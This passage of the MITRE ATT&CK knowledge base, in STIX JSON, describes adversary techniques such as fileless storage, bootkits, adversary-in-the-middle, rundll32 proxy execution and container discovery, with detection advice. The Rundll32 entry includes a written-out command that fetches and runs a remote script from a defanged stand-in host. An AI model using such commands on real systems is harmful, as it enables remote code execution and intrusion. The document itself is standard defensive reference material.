"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1113", "external_id": "T1113"}, {"source_name": "CopyFromScreen .NET", "description": "Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved March 24, 2020.", "url": "https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8"}, {"source_name": "Antiquated Mac Malware", "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-31T14:00:00.188Z", "name": "Fileless Storage", "description": "Adversaries may store data in \"fileless\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage.\n\nAdversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored.\n\nSome forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\\System32\\Wbem\\Repository`) or Registry (e.g., `%SystemRoot%\\System32\\Config`) physical files.(Citation: Microsoft Fileless) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Christopher Peacock", "Denise Tan", "Mark Wee", "Simona David", "Xavier Rousseau"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939", "created": "2023-03-23T19:55:25.546Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1027/011", "external_id": "T1027.011"}, {"source_name": "SecureList Fileless", "description": "Legezo, D. (2022, May 4). A new secret stash for \u201cfileless\u201d malware. Retrieved March 23, 2023.", "url": "https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/"}, {"source_name": "Microsoft Fileless", "description": "Microsoft. (2023, February 6). Fileless threats. Retrieved March 23, 2023.", "url": "https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Bootkit", "description": "A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016)\n\nAdversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\n### Master Boot Record\nThe MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)\n\n### Volume Boot Record\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--02fefddc-fb1b-423f-a76b-7552dd211d4d", "created": "2017-05-31T21:30:54.661Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1067", "external_id": "T1067"}, {"source_name": "MTrends 2016", "description": "Mandiant. (2016, February). M-Trends 2016. Retrieved January 4, 2017.", "url": "https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf"}, {"source_name": "Lau 2011", "description": "Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014.", "url": "http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-04-16T12:23:13.621Z", "name": "Boot or Logon Initialization Scripts", "description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke March 2019) Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. \n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. \n\nAn adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Windows", "Linux", "Network"], "x_mitre_version": "2.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", "created": "2017-05-31T21:30:38.910Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1037", "external_id": "T1037"}, {"source_name": "Anomali Rocke March 2019", "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.", "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"}, {"source_name": "Mandiant APT29 Eye Spy Email Nov 22", "description": "Mandiant. (2022, May 2). UNC3524: Eye Spy on Your Email. Retrieved August 17, 2023.", "url": "https://www.mandiant.com/resources/blog/unc3524-eye-spy-email"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-18T14:26:21.852Z", "name": "Adversary-in-the-Middle", "description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\n\nFor example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) and session cookies ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)).(Citation: volexity_0day_sophos_FW)(Citation: Token tactics) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)\n\nAdversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}, {"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Mayuresh Dani, Qualys", "Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project", "NEC"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor network traffic for anomalies associated with known AiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux", "Network"], "x_mitre_version": "2.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "created": "2020-02-11T19:07:12.114Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1557", "external_id": "T1557"}, {"source_name": "dns_changer_trojans", "description": "Abendan, O. (2012, June 14). How DNS Changer Trojans Direct Users to Threats. Retrieved October 28, 2021.", "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/125/how-dns-changer-trojans-direct-users-to-threats"}, {"source_name": "volexity_0day_sophos_FW", "description": "Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.", "url": "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/"}, {"source_name": "taxonomy_downgrade_att_tls", "description": "Alashwali, E. S., Rasmussen, K. (2019, January 26). What's in a Downgrade? A Taxonomy of Downgrade Attacks in the TLS Protocol and Application Protocols Using TLS. Retrieved December 7, 2021.", "url": "https://arxiv.org/abs/1809.05681"}, {"source_name": "ad_blocker_with_miner", "description": "Kuzmenko, A.. (2021, March 10). Ad blocker with miner included. Retrieved October 28, 2021.", "url": "https://securelist.com/ad-blocker-with-miner-included/101105/"}, {"source_name": "Token tactics", "description": "Microsoft Incident Response. (2022, November 16). Token tactics: How to prevent, detect, and respond to cloud token theft. Retrieved December 26, 2023.", "url": "https://www.microsoft.com/en-us/security/blog/2022/11/16/token-tactics-how-to-prevent-detect-and-respond-to-cloud-token-theft/"}, {"source_name": "mitm_tls_downgrade_att", "description": "praetorian Editorial Team. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved December 8, 2021.", "url": "https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/"}, {"source_name": "Rapid7 MiTM Basics", "description": "Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March 2, 2020.", "url": "https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/"}, {"source_name": "tlseminar_downgrade_att", "description": "Team Cinnamon. (2017, February 3). Downgrade Attacks. Retrieved December 9, 2021.", "url": "https://tlseminar.github.io/downgrade-attacks/"}, {"source_name": "ttint_rat", "description": "Tu, L. Ma, Y. Ye, G. (2020, October 1). Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities. Retrieved October 28, 2021.", "url": "https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-09-29T19:50:06.736Z", "name": "System Owner/User Discovery", "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nVarious utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Austin Clark, @c2defense"], "x_mitre_deprecated": false, "x_mitre_detection": "`System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nFor network infrastructure devices, collect AAA logging to monitor `show` commands being run by non-standard users from non-standard locations.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", "created": "2017-05-31T21:30:35.733Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1033", "external_id": "T1033"}, {"source_name": "show_ssh_users_cmd_cisco", "description": "Cisco. (2023, March 7). Cisco IOS Security Command Reference: Commands S to Z . Retrieved July 13, 2022.", "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s5.html"}, {"source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018", "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-02-28T21:13:02.648Z", "name": "Acquire Infrastructure", "description": "Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090), including from residential proxy services.(Citation: amnesty_nso_pegasus)(Citation: FBI Proxies Credential Stuffing)(Citation: Mandiant APT29 Microsoft 365 2022) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Shailesh Tiwary (Indian Army)", "Goldstein Menachem"], "x_mitre_deprecated": false, "x_mitre_detection": "Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. \n\nOnce adversaries have provisioned infrastructure (ex: a server for use in command and control), internet scans may help proactively discover adversary acquired infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", "created": "2020-09-30T16:37:40.271Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1583", "external_id": "T1583"}, {"source_name": "amnesty_nso_pegasus", "description": "Amnesty International Security Lab. (2021, July 18). Forensic Methodology Report: How to catch NSO Group\u2019s Pegasus. Retrieved February 22, 2022.", "url": "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/"}, {"source_name": "Mandiant APT29 Microsoft 365 2022", "description": "Douglas Bienstock. (2022, August 18). You Can\u2019t Audit Me: APT29 Continues Targeting Microsoft 365. Retrieved February 23, 2023.", "url": "https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft"}, {"source_name": "FBI Proxies Credential Stuffing", "description": "FBI. (2022, August 18). Proxies and Configurations Used for Credential Stuffing Attacks on Online Customer Accounts . Retrieved July 6, 2023.", "url": "https://www.ic3.gov/Media/News/2022/220818.pdf"}, {"source_name": "Free Trial PurpleUrchin", "description": "Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.", "url": "https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/"}, {"source_name": "Koczwara Beacon Hunting Sep 2021", "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.", "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2"}, {"source_name": "TrendmicroHideoutsLease", "description": "Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.", "url": "https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf"}, {"source_name": "Mandiant SCANdalous Jul 2020", "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.", "url": "https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation"}, {"source_name": "ThreatConnect Infrastructure Dec 2020", "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-08-14T15:35:28.965Z", "name": "Rundll32", "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).\n\nAdditionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Gareth Phillips, Seek Ltd.", "Casey Smith", "Ricardo Dias", "James_inthe_box, Me"], "x_mitre_deprecated": false, "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.\n\nCommand arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Digital Certificate Validation", "Application control", "Anti-virus"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", "created": "2020-01-23T18:03:46.248Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1218/011", "external_id": "T1218.011"}, {"source_name": "rundll32.exe defense evasion", "description": "Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022.", "url": "https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/"}, {"source_name": "Attackify Rundll32.exe Obscurity", "description": "Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.", "url": "https://www.attackify.com/blog/rundll32_execution_order/"}, {"source_name": "This is Security Command Line Confusion", "description": "B. Ancel. (2014, August 20). Poweliks \u2013 Command Line Confusion. Retrieved March 5, 2018.", "url": "https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/"}, {"source_name": "Github NoRunDll", "description": "gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.", "url": "https://github.com/gtworek/PSBits/tree/master/NoRunDll"}, {"source_name": "Trend Micro CPL", "description": "Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.", "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Container and Resource Discovery", "description": "Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.\n\nThese resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment\u2019s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary\u2019s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Vishwas Manral, McAfee", "Center for Threat-Informed Defense (CTID)", "Yossi Weizman, Azure Defender Research Team"], "x_mitre_deprecated": false, "x_mitre_detection": "Establish centralized logging for the activity of container and Kubernetes cluster components. This can be done by deploying logging agents on Kubernetes nodes and retrieving logs from sidecar proxies for application pods to detect malicious activity at the cluster level.\n\nMonitor logs for actions that could be taken to gather information about container infrastructure, including the use of discovery API calls by new or unexpected users. Monitor account activity logs to see actions performed and activity associated with the Kubernetes dashboard and other web applications. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Containers"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336", "created": "2021-03-31T14:26:00.848Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1613", "external_id": "T1613"}, {"source_name": "Docker API", "description": "Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved March 31, 2021.", "url": "https://docs.docker.com/engine/api/v1.41/"}, {"source_name": "Kubernetes API", "description": "The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.", "url": "https://kubernetes.io/docs/concepts/overview/kubernetes-api/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-10-20T21:20:22.578Z", "name": "Serverless", "description": "Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.\n\nOnce acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Awake Security"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--04a5a8ab-3bc8-4c83-95c9-55274a89786d", "created": "2022-07-08T12:39:29.684Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1583/007", "external_id": "T1583.007"}, {"source_name": "AWS Lambda Redirector", "description": "Adam Chester. (2020, February 25). AWS Lambda Redirector. Retrieved July 8, 2022.", "url": "https://blog.xpnsec.com/aws-lambda-redirector/"}, {"source_name": "Detecting Command & Control in the Cloud", "description": "Gary Golomb. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved July 8, 2022.", "url": "https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/"}, {"source_name": "BlackWater Malware Cloudflare Workers", "description": "Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.", "url": "https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": 